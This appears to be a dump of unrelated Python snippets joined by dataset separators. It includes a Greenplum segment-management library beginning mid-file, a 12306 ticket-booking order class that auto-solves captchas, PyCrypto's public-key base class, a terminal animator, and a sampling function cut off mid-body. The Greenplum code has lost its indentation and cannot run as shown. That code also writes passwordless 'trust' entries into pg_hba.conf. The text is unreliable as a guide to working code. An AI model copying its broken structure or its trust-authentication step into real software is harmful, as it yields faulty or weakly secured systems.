self.DEFAULT_LOCALE_SETTING='en_US.utf-8'
self.PING_TIME='-c 1'
self.DF='%s -P' % findCmdInPath('df')
self.DU_TXT='-c'
self.GTAR = findCmdInPath('tar')
else:
fatal('platform not supported')
def chk_environ(self):
self.GPHOME=os.getenv('GPHOME')
if not self.GPHOME:
fatal('GPHOME not found')
self.USER =os.getenv('USER') or os.getenv('LOGNAME')
if not self.USER:
fatal('USER not found')
LIB_PATH=os.getenv(self.LIB_TYPE)
if not LIB_PATH:
LIB_PATH='.'
PATH=os.getenv('PATH')
if not PATH:
PATH='.'
os.environ[self.LIB_TYPE]='%s/lib:%s/ext/python/lib:%s' % (self.GPHOME, self.GPHOME, LIB_PATH)
os.environ['PATH']='%s/bin:%s/ext/python/bin:%s' % (self.GPHOME, self.GPHOME, PATH)
ENV = Env()
#############
def ping_host(host, fail_exit=False):
if ENV.SYSTEM == 'darwin':
(ok, out) = run('%s %s %s > /dev/null 2>&1' % (ENV.PING, ENV.PING_TIME, host))
else:
(ok, out) = run('%s %s %s > /dev/null 2>&1' % (ENV.PING, host, ENV.PING_TIME))
if ok:
log_info('%s contact established' % host)
else:
if fail_exit:
fatal('Unable to contact %s' % host)
else:
log_warn('Unable to contact %s' % host)
return ok
def chk_postgres_version(host):
cmd = makeCommand('%s --gp-version' % os.path.join(os.environ.get('GPHOME'), 'bin/postgres'))
(ok, out) = run(cmd)
if not ok:
log_error('Unable to get Greenplum database version')
return False
current = out[0].strip()
(ok, out) = run('ssh %s "%s"' % (host, cmd))
if not ok:
log_error('Unable to get Greenplum database version on remote host %s' % host)
return False
remote = out[0].strip()
if current != remote:
log_error('Greenplum database version does not match. %s != %s' % (current, remote))
return False
return True
#############
def postgres_active(port, host=None):
ret = 0
pg_lock_file = '/tmp/.s.PGSQL.%d.lock' % port
pg_lock_netstat = 0
pid = 0
# ping host if present
if host:
ok = ping_host(host)
if not ok:
return (ok, pid)
# netstat to check the port number
(ok, out) = run('%s %s -an 2> /dev/null | %s ".s.PGSQL.%d" | %s \'{print $NF}\'| %s -F"." \'{print $NF}\' | %s -u' %
(host and gplib.ssh_prefix(host=host) or '', ENV.NETSTAT, ENV.GREP, port, ENV.AWK, ENV.AWK, ENV.SORT))
if not ok:
return (ok, pid)
for p_chk in out:
p = int(p_chk)
if p == port:
pg_lock_netstat = port
pg_lock_tmp = False
if file_exists(file=pg_lock_file, host=host):
pg_lock_tmp = True
if pg_lock_netstat == 0 and pg_lock_tmp == False:
ret = 1
pid = 0
log_info('No socket connection or lock file in /tmp found for %s port=%d' % (host and host or '', port))
else:
if not pg_lock_tmp and pg_lock_netstat != 0:
log_warn('No lock file %s but process running on %s port %d' % (pg_lock_file, host and host or '', port))
ret = 1
if pg_lock_tmp and pg_lock_netstat == 0:
if file_exists(file=pg_lock_file, host=host):
(ok, out) = run('%s %s %s | %s -1 | %s \'{print $1}\'' % (host and gplib.ssh_prefix(host=host) or '', ENV.CAT, pg_lock_file, ENV.HEAD, ENV.AWK))
if not ok:
return (ok, pid)
pid = int(out[0])
else:
log_warn('Unable to access %s' % pg_lock_file)
log_warn('Have lock file %s but no process running on %s port %d' % (pg_lock_file, host and host or '', port))
ret = 1
if pg_lock_tmp and pg_lock_netstat != 0:
if file_exists(file=pg_lock_file, host=host):
(ok, out) = run('%s %s %s | %s -1 | %s \'{print $1}\'' % (host and gplib.ssh_prefix(host=host) or '', ENV.CAT, pg_lock_file, ENV.HEAD, ENV.AWK))
if not ok:
return (ok, pid)
pid = int(out[0])
else:
log_warn('Unable to access %s' % pg_lock_file)
ret = 1
#log_info('Have lock file %s and a process running on %s port %d' % (pg_lock_file, host and host or '', port))
return (not ret, pid)
#############
def get_master_port(master_data_dir):
master_port = 0
if not os.path.exists(master_data_dir):
fatal('No %s directory' % master_data_dir)
if os.path.exists(os.path.join(master_data_dir, 'postgresql.conf')):
(ok, out) = run('%s \'split($0,a,"#")>0 && split(a[1],b,"=")>1 {print b[1] " " b[2]}\' %s/postgresql.conf | %s \'$1=="port" {print $2}\' | %s -1' % (ENV.AWK, master_data_dir, ENV.AWK, ENV.TAIL))
if not ok or out[0].strip() == '':
fatal('Failed to obtain master port number from %s/postgresql.conf' % master_data_dir)
master_port = int(out[0])
else:
fatal('Do not have access to %s/postgresql.conf' % master_data_dir)
return master_port
#############
def chk_db_running(db, chk_dispatch_access):
master_data_directory = os.getenv('MASTER_DATA_DIRECTORY')
if not directory_exists(master_data_directory):
fatal('No Master %s directory' % master_data_directory)
if not file_exists('%s/postgresql.conf' % master_data_directory):
fatal('No %s/postgresql.conf file' % master_data_directory)
port = get_master_port(master_data_directory)
try:
db.execute('''select d.datname as "Name", r.rolname as "Owner",
pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding"
FROM pg_catalog.pg_database d JOIN pg_catalog.pg_authid r ON d.datdba = r.oid ORDER BY 1''')
if chk_dispatch_access:
pass
except pg8000.errors.InterfaceError, e:
return False
return True
#############
def unique(alist):
set = {}
map(set.__setitem__, alist, [])
return set.keys()
#############
def chk_multi_home(hostlist, full=True):
hosts = full and hostlist or hostlist[0:2]
hostnames=[]
for host in hosts:
(ok, out) = run('%s %s' % (gplib.ssh_prefix(host=host), ENV.HOSTNAME))
if not ok:
error('failed to run hostname on remote host')
hostnames.append(out[0].strip())
hostnames_uniq = unique(hostnames)
return len(hostnames_uniq) != len(hostnames)
#############
def get_qe_details(db, order_by = "dbid"):
db.execute('''
select a.hostname, fse.fselocation as datadir, a.port, b.valid,
b.definedprimary, a.dbid, a.content
from gp_segment_configuration a, gp_pgdatabase b, pg_filespace_entry fse
where a.dbid=b.dbid and fsedbid=a.dbid
and fsefsoid = (select oid from pg_filespace where fsname='pg_system')
and a.content <> -1 order by a.%s''' % order_by)
rows = [ r for r in db.iterate_dict() ]
return rows
#############
def chk_mirrors_configured(db):
db.execute('select count(dbid)/count(distinct(content)) from gp_segment_configuration where content<>-1')
r = db.read_tuple()
return r[0] == 2
#############
def get_mirror_type(db, multi_home):
if not chk_mirrors_configured(db):
mir_type = 'No Mirror'
mir_type_num = ENV.MIRROR_NULL_TYPE
else:
db.execute("select count(distinct hostname)/(select count(distinct hostname) from gp_segment_configuration where preferred_role='p' and content<>-1) from gp_segment_configuration where content<>-1")
r = db.read_tuple()
sep_count = r[0]
if sep_count == 2:
sep_text = '[Separate array]'
else:
sep_text = '[Shared array]'
# get number of primary hosts
db.execute("select count(distinct(hostname)) from gp_segment_configuration where content<>-1")
r = db.read_tuple()
num_seg_hosts = r[0]
# get the primary and mirror hostnames for the first segment instance host
db.execute("select hostname, content, preferred_role='p' as definedprimary from gp_segment_configuration where content>-1 and content<(select max(port)-min(port)+1 from gp_segment_configuration where content<>-1 and preferred_role='p') order by content,dbid")
first_pri_mir_array = [ x for x in db.iterate_dict() ]
first_pri_array = filter(lambda (x): x['definedprimary'] == True, first_pri_mir_array)
first_mir_array = filter(lambda (x): x['definedprimary'] == False, first_pri_mir_array)
seg_per_host = len(first_pri_mir_array) / 2
if not multi_home:
hosts = [ x['hostname'] for x in first_pri_mir_array ]
if len(unique(hosts)) == 2 or num_seg_hosts == 1:
mir_type = 'Group [Single-home] %s' % sep_text
mir_type_num = ENV.MIRROR_SINGLE_HOME_GROUP_TYPE
else:
mir_type = 'Spread [Single-home] %s' % sep_text
mir_type_num = ENV.MIRROR_SINGLE_HOME_SPREAD_TYPE
else:
mir_array = []
for i in range(seg_per_host):
pri_host = first_pri_array[i]['hostname']
db.execute("select hostname from gp_segment_configuration where preferred_role = 'm' and content = %d" % (i))
r = db.read_tuple()
mir_host = r[0]
(ok, out) = run('%s "hostname"' % (gplib.ssh_prefix(host=mir_host)))
if not ok:
error('hostname on %s failed' % mir_host)
mir_array.append(out[0])
uniq_cnt = len(unique(mir_array))
if uniq_cnt == 1:
mir_type = 'Group [Multi-home] %s' % sep_text
mir_type_num = ENV.MIRROR_MULTI_HOME_GROUP_TYPE
else:
                mir_type = 'Spread [Multi-home] %s' % sep_text
mir_type_num = ENV.MIRROR_MULTI_HOME_SPREAD_TYPE
return (mir_type_num, mir_type)
#############
def get_ipaddr(host):
(ok, out) = run('%s "%s %s | %s \\"inet\\"| %s -v \\"127.0.0\\"| %s -v \\"inet6\\""' %
(gplib.ssh_prefix(host=host), ENV.IFCONFIG,
ENV.IFCONFIG_TXT, ENV.GREP, ENV.GREP, ENV.GREP))
if not ok:
return None
addr = []
for l in out:
x = l.strip().split()
ip = x[1].split(':')
addr.append(len(ip) == 2 and ip[1] or ip[0])
return addr
#############
def get_ipaddr_to_stdout(host):
addr = get_ipaddr(host)
if addr:
for a in addr:
sys.stdout.write(a)
sys.stdout.write(' ')
sys.stdout.write('\n')
else:
sys.exit(1)
#############
def edit_file(host, file, search_txt, sub_txt, append=False):
if host != 'localhost':
gphome = os.environ.get('GPHOME')
cmd = makeCommand('''python -c \\"import sys; sys.path.extend(['%s', '%s']); import gpmlib; gpmlib.edit_file('localhost', '%s', '%s', '%s', %s)\\"''' %
(os.path.join(gphome, 'bin', 'lib'),
os.path.join(gphome, 'lib', 'python'),
file,
search_txt,
sub_txt,
str(append)))
(ok, out) = run2('''%s "%s"''' % (gplib.ssh_prefix(host=host), cmd), True)
return ok
else:
f = None
tmpf = None
tmpfile = '%s.tmp' % file
try:
try:
f = open(file, 'r')
tmpf = open(tmpfile, 'w')
for line in f:
if line.find(search_txt) != -1:
tmpf.write(sub_txt)
if append:
tmpf.write(' # ')
tmpf.write(line)
else:
tmpf.write('\n')
else:
tmpf.write(line)
except IOError, e:
log_error(str(e))
return False
finally:
if f: f.close()
if tmpf: tmpf.close()
try:
os.rename(tmpfile, file)
except OSError, e:
log_error('rename file from %s to %s failed' % (tmpfile, file))
return False
return True
class _SyncProgress:
markLock = threading.Lock()
def __init__(self, logfunc, dst_cfg):
self.logfunc = logfunc
self.dst_host = dst_cfg["hostname"]
self.dst_dir = dst_cfg["datadir"]
self.dbid = dst_cfg["dbid"] if dst_cfg.has_key("dbid") else None
self.content = dst_cfg["content"] if dst_cfg.has_key("content") else None
self._tag = "%s:dbid=%s" % (self.dst_host, self.dbid) if self.dbid != None else "%s:%s" % (self.dst_host, self.dst_dir)
def mark_sync_progress(self, message):
with _SyncProgress.markLock:
self.logfunc("%s %s" % (self._tag, message))
#############
def sync_segment_datadir(src_host, src_dir, dst_cfg, logfile,
force_stop=True, setpid_callback=None, err_is_fatal=True,
verbose=False, progressBytes=None, progressTime=None):
if setpid_callback:
log_warn('Use of sync_segment_datadir setpid_callback keyword is deprecated')
if directory_exists(dst_cfg['datadir'], dst_cfg['hostname']):
log_info('Data Directory %s exists' % dst_cfg['datadir'])
else:
# make mirror data directory
log_info('Make directory %s' % dst_cfg['datadir'])
(ok, out) = run('%s "%s %s && chmod 700 %s"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
ENV.MKDIR,
dst_cfg['datadir'],
dst_cfg['datadir']))
if not ok:
fatal('mkdir directory %s host %s failed' % (dst_cfg['datadir'], dst_cfg['hostname']))
# Call PysyncProxy to initiate the sync operation with progress feedback
pysyncOptions = ["--delete", "-x", "db_dumps", "-x", "pg_log"]
sync = pysync.PysyncProxy(src_host, src_dir, dst_cfg['hostname'], dst_cfg['datadir'],
pysyncOptions, verbose=verbose,
progressBytes=progressBytes, progressTime=progressTime,
recordProgressCallback=_SyncProgress(log_info, dst_cfg).mark_sync_progress)
code = sync.run()
ok = (code == 0)
if not ok:
log_warn('-----------------------------------------------------')
log_warn('Command Failed: %s' % sync.cmd)
log_warn('Return code: %d' % code)
log_warn('Exit status: %d' % os.WEXITSTATUS(sync.returncode))
if sync.stdout:
log_warn('Standard output:')
for l in sync.stdout:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard output: None')
if sync.stderr:
log_warn('Standard error:')
for l in sync.stderr:
log_warn('\t %s' % l.strip())
else:
log_warn('Standard error: None')
log_warn('-----------------------------------------------------')
if err_is_fatal:
fatal('failed to synchronize data from primary segment %s:%s to mirror segment %s:%s' % (src_host, src_dir,
dst_cfg['hostname'], dst_cfg['datadir']))
else:
log_error('failed to synchronize data from primary segment %s:%s to mirror segment %s:%s' % (src_host, src_dir,
dst_cfg['hostname'], dst_cfg['datadir']))
return False
# delete postmaster.pid in case active segment is still running
postmaster_pid = os.path.join(dst_cfg['datadir'], 'postmaster.pid')
(ok, out) = run('%s "if [ -f %s ] ; then rm -rf %s; fi"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
postmaster_pid,
postmaster_pid))
# delete postmaster.opts in case active segment is still running
postmaster_opts = os.path.join(dst_cfg['datadir'], 'postmaster.opts')
(ok, out) = run('%s "if [ -f %s ] ; then rm -rf %s; fi"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
postmaster_opts,
postmaster_opts))
# change port number in postgresql.conf
sub_txt = 'port=%d' % dst_cfg['port']
ok = edit_file(dst_cfg['hostname'], os.path.join(dst_cfg['datadir'], 'postgresql.conf'),
'port=', sub_txt, True)
if not ok:
fatal('failed to edit postgresql.conf')
# start mirror segment in admin mode
log_info('create pg_log directory')
cmd = makeCommand('mkdir %s/pg_log' % dst_cfg['datadir'])
(ok, out) = run_warn('%s "%s"' % (gplib.ssh_prefix(host=dst_cfg['hostname']),cmd))
log_info('sync segment datadir=%s port=%d on host %s succeeded' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
return True
log_info('start segment datadir=%s port=%d on %s' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
cmd = makeCommand('env PGOPTIONS=\\"-c gp_session_role=utility\\" %s -w -D %s -l %s/pg_log/startup.log -o \\"-i -p %d \\" start 2>&1' %
(os.path.join(ENV.GPHOME, 'bin/pg_ctl'),
dst_cfg['datadir'], dst_cfg['datadir'], dst_cfg['port']))
(ok, out) = run_warn('%s "%s"' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
cmd))
if not ok:
fatal('failed to start mirror segment %s:%s in admin mode' % (dst_cfg['hostname'], dst_cfg['datadir']))
if force_stop:
# stop mirror segment
log_info('stop segment datadir=%s port=%d on %s' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
cmd = makeCommand('env PGOPTIONS=\\"-c gp_session_role=utility\\" %s -w stop -D %s -m smart -l %s.log' %
(os.path.join(ENV.GPHOME, 'bin/pg_ctl'),
dst_cfg['datadir'], dst_cfg['datadir']))
(ok, out) = run_warn('%s "%s" >> %s 2>&1' %
(gplib.ssh_prefix(host=dst_cfg['hostname']),
cmd,
logfile))
if not ok:
fatal('failed to stop mirror segment %s:%s' % (dst_cfg['hostname'], dst_cfg['datadir']))
log_info('sync segment datadir=%s port=%d on host %s succeeded' % (dst_cfg['datadir'], dst_cfg['port'], dst_cfg['hostname']))
return True
#############
def append_pg_hba(host, datadir, new_addr):
pg_hba = os.path.join(datadir, 'pg_hba.conf')
for addr in new_addr:
(ok, out) = run_warn('%s "echo host all all %s/32 trust >> %s"' %
(gplib.ssh_prefix(host=host),
addr, pg_hba))
if not ok:
fatal('update %s:%s failed' % (host, pg_hba))
return True
#############
def get_gp_prefix(datadir):
base = os.path.basename(datadir)
idx = base.rfind('-1')
if idx == -1:
return None
return base[0:idx]
##################
def chk_on_passive_standby(master_port):
gpsync_count = 0
(ok, pid) = postgres_active(master_port)
postmaster_opts = os.path.join(os.environ.get('MASTER_DATA_DIRECTORY'), 'postmaster.opts')
if os.path.isfile(postmaster_opts):
(okok, out) = run('%s -c gpsync %s' % (ENV.GREP, postmaster_opts))
gpsync_count = int(out[0])
if ok and gpsync_count != 0:
log_fatal('Cannot run this script on a passive standby instance')
log_fatal('where there is a conflict with the current value of')
log_fatal('the MASTER_DATA_DIRECTORY environment variable setting.')
return True
if gpsync_count != 0:
        log_fatal('Cannot run this script on the standby instance')
        log_fatal('Status indicates that the standby instance process is not running')
log_fatal('Check standby process status via gpstate -f on Master instance')
return True
return False
def get_copy_filter(host, port):
# pg8000 connects to master in utility mode
db = None
databases = None
filters = []
try:
db = pg8000.Connection(host=host, user=ENV.USER, database='template1', port=port, options='-c gp_session_role=utility')
# get list of user databases
# select oid, datname from pg_database where oid >= 16384;
db.execute('select oid, datname from pg_database where oid >= 16384')
# db.execute('select oid, datname from pg_database')
databases = [ r for r in db.iterate_tuple() ]
except Exception, e:
print str(e)
return None
finally:
if db:
db.close()
db = None
# foreach database
for d in databases:
try:
oid = d[0]
datname = d[1]
db = pg8000.Connection(host=host, user=ENV.USER, database=datname, port=port, options='-c gp_session_role=utility')
# get user table filter (user table, TOAST table, sequences)
            # select oid from pg_class where oid >= 16384 and relkind='r';
db.execute("select oid from pg_class where oid >= 16384 and relkind='r'")
table_filter = [ r[0] for r in db.iterate_tuple() ]
# get user TOAST table filter
            # select oid from pg_class where oid >= 16384 and relkind='t';
db.execute("select oid from pg_class where oid >= 16384 and relkind='t'")
toast_filter = [ r[0] for r in db.iterate_tuple() ]
# get sequences filter
            # select oid from pg_class where oid >= 16384 and relkind='S';
db.execute("select oid from pg_class where oid >= 16384 and relkind='S'")
sequence_filter = [ r[0] for r in db.iterate_tuple() ]
# get index filter
            # select oid from pg_class where oid >= 16384 and relkind='i';
db.execute("select oid from pg_class where oid >= 16384 and relkind='i'")
index_filter = [ r[0] for r in db.iterate_tuple() ]
filters.append((oid, table_filter, toast_filter, sequence_filter, index_filter))
except Exception, e:
print str(e)
continue
finally:
if db:
db.close()
db = None
return filters
|
StarcoderdataPython
|
11229353
|
# Moved to test/python/test_torch_ad
|
StarcoderdataPython
|
206262
|
import sys
sys.stdin = open('input.txt')
raw_input()
result = []
while True:
line = raw_input().strip()
if line == '___________':
break
binStr = line.replace(' ', '0').replace(
'o', '1').strip('|').replace('.', '')
# print binStr
n = int(binStr, base=2)
result.append(chr(n))
print ''.join(result)
|
StarcoderdataPython
|
8041314
|
# coding=utf-8
import datetime
import time
from inter.CheckRandCodeAnsyn import checkRandCodeAnsyn
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.GetRandCode import getRandCode
from inter.QueryOrderWaitTime import queryOrderWaitTime
class confirmSingleForQueue:
def __init__(self, session, ifShowPassCodeTime, is_node_code, token, set_type, ticket_peoples, ticketInfoForPassengerForm,
oldPassengerStr, passengerTicketStrList):
self.session = session
self.ifShowPassCodeTime = ifShowPassCodeTime
self.is_node_code = is_node_code
self.token = token
self.set_type = set_type
self.ticket_peoples = ticket_peoples
self.ticketInfoForPassengerForm = ticketInfoForPassengerForm
self.passengerTicketStrList = passengerTicketStrList
self.oldPassengerStr = oldPassengerStr
def data_par(self):
"""
        Simulates clicking the confirm button when submitting an order; the parameters are still obtained via get_ticketInfoForPassengerForm.
:return:
"""
if not self.passengerTicketStrList and not self.oldPassengerStr:
s = getPassengerDTOs(session=self.session, ticket_peoples=self.ticket_peoples, set_type=self.set_type)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr()
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
        data = {
            "passengerTicketStr": self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)),
            "oldPassengerStr": "".join(self.oldPassengerStr),
            "purpose_codes": self.ticketInfoForPassengerForm["purpose_codes"],
            "key_check_isChange": self.ticketInfoForPassengerForm["key_check_isChange"],
            "leftTicketStr": self.ticketInfoForPassengerForm["leftTicketStr"],
            "train_location": self.ticketInfoForPassengerForm["train_location"],
            "seatDetailType": "",  # seat selection would go here, but 12306 does not support automatic seat selection yet, so the default is kept
            "roomType": "00",  # apparently chosen via an id with two values, "00" and "10"; that id could not be found on the 12306 page, so "00" is hard-coded (unclear whether this can cause errors)
"dwAll": "N",
"whatsSelect": 1,
"_json_at": "",
"randCode": "",
"choose_seats": "",
"REPEAT_SUBMIT_TOKEN": self.token,
}
return data
def sendConfirmSingleForQueue(self):
"""
        # Simulates querying the current queue length for this train
        # Returns a prompt string built from the response information
:return:
"""
data = self.data_par()
checkQueueOrderUrl = self.session.urls["checkQueueOrderUrl"]
try:
if self.is_node_code:
                print(u"Using automatic captcha recognition")
for i in range(3):
randCode = getRandCode(is_auto_code=True, auto_code_type=2)
checkcode = checkRandCodeAnsyn(self.session, randCode, self.token)
if checkcode == 'TRUE':
                        print(u"Captcha accepted, submitting the order")
data['randCode'] = randCode
break
else:
                        print(u"Captcha incorrect, retrying (attempt {0})".format(i + 1))
                print(u"Captcha failed more than the 3 allowed attempts, giving up this booking attempt!")
else:
                print(u"No captcha required")
time.sleep(self.ifShowPassCodeTime)
checkQueueOrderResult = self.session.httpClint.send(checkQueueOrderUrl, data)
if "status" in checkQueueOrderResult and checkQueueOrderResult["status"]:
c_data = checkQueueOrderResult["data"] if "data" in checkQueueOrderResult else {}
if 'submitStatus' in c_data and c_data['submitStatus'] is True:
                    # print(u"Order submitted successfully!")
qow = queryOrderWaitTime(self.session)
qow.sendQueryOrderWaitTime()
else:
if 'errMsg' in c_data and c_data['errMsg']:
                        print(u"Order submission failed: {0}".format(c_data['errMsg']))
else:
print(c_data)
                        print(u"Booking failed! Sorry, please retry the booking request!")
elif "messages" in checkQueueOrderResult and checkQueueOrderResult["messages"]:
                print(u"Order submission failed, error message: " + checkQueueOrderResult["messages"])
else:
                print(u"Order being submitted, please wait: " + checkQueueOrderResult["message"])
except ValueError:
            print(u"No response from endpoint {}".format(checkQueueOrderUrl))
|
StarcoderdataPython
|
3418688
|
<reponame>J-E-J-S/aaRS-Pipeline
#
# pubkey.py : Internal functions for public key operations
#
# Part of the Python Cryptography Toolkit
#
# Written by <NAME>, <NAME>, and others
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
#
__revision__ = "$Id$"
import types, warnings
from Crypto.Util.number import *
# Basic public key class
class pubkey:
def __init__(self):
pass
def __getstate__(self):
"""To keep key objects platform-independent, the key data is
converted to standard Python long integers before being
written out. It will then be reconverted as necessary on
restoration."""
d=self.__dict__
for key in self.keydata:
if d.has_key(key): d[key]=long(d[key])
return d
def __setstate__(self, d):
"""On unpickling a key object, the key data is converted to the big
number representation being used, whether that is Python long
integers, MPZ objects, or whatever."""
for key in self.keydata:
if d.has_key(key): self.__dict__[key]=bignum(d[key])
def encrypt(self, plaintext, K):
"""encrypt(plaintext:string|long, K:string|long) : tuple
Encrypt the string or integer plaintext. K is a random
parameter required by some algorithms.
"""
wasString=0
if isinstance(plaintext, types.StringType):
plaintext=bytes_to_long(plaintext) ; wasString=1
if isinstance(K, types.StringType):
K=bytes_to_long(K)
ciphertext=self._encrypt(plaintext, K)
if wasString: return tuple(map(long_to_bytes, ciphertext))
else: return ciphertext
def decrypt(self, ciphertext):
"""decrypt(ciphertext:tuple|string|long): string
Decrypt 'ciphertext' using this key.
"""
wasString=0
if not isinstance(ciphertext, types.TupleType):
ciphertext=(ciphertext,)
if isinstance(ciphertext[0], types.StringType):
ciphertext=tuple(map(bytes_to_long, ciphertext)) ; wasString=1
plaintext=self._decrypt(ciphertext)
if wasString: return long_to_bytes(plaintext)
else: return plaintext
def sign(self, M, K):
"""sign(M : string|long, K:string|long) : tuple
Return a tuple containing the signature for the message M.
K is a random parameter required by some algorithms.
"""
if (not self.has_private()):
raise TypeError('Private key not available in this object')
if isinstance(M, types.StringType): M=bytes_to_long(M)
if isinstance(K, types.StringType): K=bytes_to_long(K)
return self._sign(M, K)
def verify (self, M, signature):
"""verify(M:string|long, signature:tuple) : bool
Verify that the signature is valid for the message M;
returns true if the signature checks out.
"""
if isinstance(M, types.StringType): M=bytes_to_long(M)
return self._verify(M, signature)
# alias to compensate for the old validate() name
def validate (self, M, signature):
warnings.warn("validate() method name is obsolete; use verify()",
DeprecationWarning)
def blind(self, M, B):
"""blind(M : string|long, B : string|long) : string|long
Blind message M using blinding factor B.
"""
wasString=0
if isinstance(M, types.StringType):
M=bytes_to_long(M) ; wasString=1
if isinstance(B, types.StringType): B=bytes_to_long(B)
blindedmessage=self._blind(M, B)
if wasString: return long_to_bytes(blindedmessage)
else: return blindedmessage
def unblind(self, M, B):
"""unblind(M : string|long, B : string|long) : string|long
Unblind message M using blinding factor B.
"""
wasString=0
if isinstance(M, types.StringType):
M=bytes_to_long(M) ; wasString=1
if isinstance(B, types.StringType): B=bytes_to_long(B)
unblindedmessage=self._unblind(M, B)
if wasString: return long_to_bytes(unblindedmessage)
else: return unblindedmessage
# The following methods will usually be left alone, except for
# signature-only algorithms. They both return Boolean values
# recording whether this key's algorithm can sign and encrypt.
def can_sign (self):
"""can_sign() : bool
Return a Boolean value recording whether this algorithm can
generate signatures. (This does not imply that this
        particular key object has the private information required
        to generate a signature.)
"""
return 1
def can_encrypt (self):
"""can_encrypt() : bool
Return a Boolean value recording whether this algorithm can
encrypt data. (This does not imply that this
        particular key object has the private information required
        to decrypt a message.)
"""
return 1
def can_blind (self):
"""can_blind() : bool
Return a Boolean value recording whether this algorithm can
blind data. (This does not imply that this
        particular key object has the private information required
        to blind a message.)
"""
return 0
# The following methods will certainly be overridden by
# subclasses.
def size (self):
"""size() : int
Return the maximum number of bits that can be handled by this key.
"""
return 0
def has_private (self):
"""has_private() : bool
Return a Boolean denoting whether the object contains
private components.
"""
return 0
def publickey (self):
"""publickey(): object
Return a new key object containing only the public information.
"""
return self
def __eq__ (self, other):
"""__eq__(other): 0, 1
Compare us to other for equality.
"""
return self.__getstate__() == other.__getstate__()
def __ne__ (self, other):
"""__ne__(other): 0, 1
Compare us to other for inequality.
"""
return not self.__eq__(other)
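# Illustrative sketch (added comment, not part of the original module): a concrete scheme
# subclasses pubkey and supplies the private primitives; the public wrappers above take care
# of the string/long conversions. Roughly:
#
#   class toycipher(pubkey):
#       keydata = ['k']
#       def __init__(self, k): self.k = bignum(k)
#       def _encrypt(self, m, K): return (m + self.k,)
#       def _decrypt(self, c): return c[0] - self.k
#       def has_private(self): return 1
#
#   toycipher(7).encrypt('hi', 0) then returns a one-element tuple that decrypt() inverts.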
|
StarcoderdataPython
|
233544
|
import itertools
import threading
import time
import sys
import os
from os import name, system
DEFAULT_FPS = 3
class Animator:
"""Base animator classes"""
def __init__(self):
self.fps = DEFAULT_FPS # the default frames per second
self.done = False
try:
self.columns, self.lines = os.get_terminal_size()
except Exception as e:
self.columns = 80
self.lines = 30
@property
def wait_between_frames(self):
return 1/self.fps
def clear(self):
# for windows
if name == 'nt':
_ = system('cls')
# for mac and linux(here, os.name is 'posix')
else:
_ = system('clear')
def carriage_return(self):
sys.stdout.write('\r')
def write(self, *args):
sys.stdout.write(*args)
def flush(self):
sys.stdout.flush()
def sleep(self, secs):
time.sleep(secs)
def clear_line(self):
self.carriage_return()
self.write(' '*(self.columns-3))
self.flush()
self.carriage_return()
    def clear_line_decorator(self, func):
        """Decorator that clears the line before and after the wrapped call."""
        def wrapper(*args, **kwargs):
            self.clear_line()
            result = func(*args, **kwargs)
            self.clear_line()
            return result
        return wrapper
def animate(self, strings_to_draw, animate_fn=None):
if animate_fn is None:
animate_fn = self.animate_fn
animate_fn(strings_to_draw=strings_to_draw)
def animate_fn(self, strings_to_draw: list):
"""Animates the string objects in the strings to draw list.
Args:
            strings_to_draw: List of strings that should be drawn in order
Returns:
nothing, but prints
"""
for string in strings_to_draw:
self.carriage_return()
self.write(string)
self.flush()
self.sleep(self.wait_between_frames)
self.write('\n')
def loop_animate(self, duration, strings_to_draw, animate_fn=None):
if animate_fn is None:
animate_fn = self.loop_animate_fn
t = threading.Thread(target=animate_fn,
kwargs={'strings_to_draw': strings_to_draw})
t.start()
# sleep while the animation is drawing
self.sleep(duration)
self.done = True
def loop_animate_fn(self, strings_to_draw: list):
"""Looping animation the string objects in the strings to draw list.
Args:
            strings_to_draw: List of strings that should be drawn in order
Returns:
nothing, but prints
"""
# reset done just in case this function has already been called.
self.done = False
for c in itertools.cycle(strings_to_draw):
if self.done:
break
self.carriage_return()
self.write(c)
self.flush()
self.sleep(self.wait_between_frames)
self.carriage_return()
self.write('\n')
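# Illustrative usage (added example, not part of the original module): draw a small
# looping spinner for two seconds with the Animator defined above.
if __name__ == '__main__':
    demo = Animator()
    demo.loop_animate(2, ['|', '/', '-', '\\'])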
|
StarcoderdataPython
|
6533051
|
from __future__ import unicode_literals
from numpy.random import choice
from collections import Counter
import pandas as pd
import numpy as np
from django.apps import apps
import string
def sample_no_replacement(full_set, previous_set=None):
# print "starting sample_no_replacement"
# if previous_set:
# print "prev set"
# print previous_set
# print full_set
if set(previous_set) == set(full_set):
        #the user has seen each of the conditions of this variable at least once
cond_counts = Counter(previous_set)
#return a list of tuples of most common e.g.
#[('a', 5), ('r', 2), ('b', 2)]
cond_common_order = cond_counts.most_common()
# print "cond_common_order"
# print cond_common_order
if cond_common_order[0][1] == cond_common_order[-1][1]:
#all conds are evenly assigned, choose randomly
cond = cond_common_order[choice(len(cond_common_order))]
#print cond
cond = cond[0]
else:
